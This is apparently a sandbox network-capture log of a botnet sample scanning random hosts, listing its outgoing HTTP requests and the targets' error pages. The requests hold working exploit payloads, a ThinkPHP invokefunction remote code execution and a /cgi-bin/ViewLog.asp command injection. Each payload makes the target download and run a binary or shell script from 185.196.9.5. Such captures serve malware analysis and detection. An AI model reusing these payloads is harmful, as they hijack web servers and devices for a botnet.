Feb 25, 2024 19:04:08.913774014 CET	339	IN	HTTP/1.0 400 Bad Request Date: Mon, 26 Feb 2024 01:04:08 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>
Feb 25, 2024 19:04:10.856656075 CET	339	IN	HTTP/1.0 400 Bad Request Date: Mon, 26 Feb 2024 01:04:08 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>
Feb 25, 2024 19:04:13.200934887 CET	339	IN	HTTP/1.0 400 Bad Request Date: Mon, 26 Feb 2024 01:04:08 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>
Feb 25, 2024 19:04:17.888607979 CET	339	IN	HTTP/1.0 400 Bad Request Date: Mon, 26 Feb 2024 01:04:08 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>
Feb 25, 2024 19:04:27.276745081 CET	339	IN	HTTP/1.0 400 Bad Request Date: Mon, 26 Feb 2024 01:04:08 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
681	192.168.2.15	57000	95.154.194.53	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.206258059 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:08.375396013 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.22.1 Date: Sun, 25 Feb 2024 18:04:08 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
682	192.168.2.15	43002	95.164.112.225	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.214184999 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:08.393878937 CET	578	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:08 GMT Server: Apache/2.4.41 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 328 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6d 32 31 33 38 34 37 32 2e 73 74 61 72 6b 2d 69 6e 64 75 73 74 72 69 65 73 2e 73 6f 6c 75 74 69 6f 6e 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at vm2138472.stark-industries.solutions Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
683	192.168.2.15	41852	95.217.79.69	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.233642101 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:08.430124998 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:04:08 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
684	192.168.2.15	54894	95.56.89.25	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.306226969 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:08.576808929 CET	29	IN	HTTP/1.1 200 OK
Feb 25, 2024 19:04:08.576848984 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
685	192.168.2.15	34354	95.181.227.236	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.589184999 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:08.971971035 CET	932	IN	HTTP/1.1 400 Bad Request Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 681 date: Sun, 25 Feb 2024 18:04:08 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
686	192.168.2.15	56472	62.202.169.182	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.624325037 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
687	192.168.2.15	60638	31.136.180.162	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.634905100 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:09.221564054 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:10.373619080 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:12.773552895 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:17.381558895 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:26.597544909 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:46.565296888 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:23.428986073 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
688	192.168.2.15	51572	31.3.23.115	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.663837910 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:08.876671076 CET	404	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:08 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
689	192.168.2.15	44300	62.29.121.79	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.674693108 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
690	192.168.2.15	44440	95.131.78.89	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.696824074 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
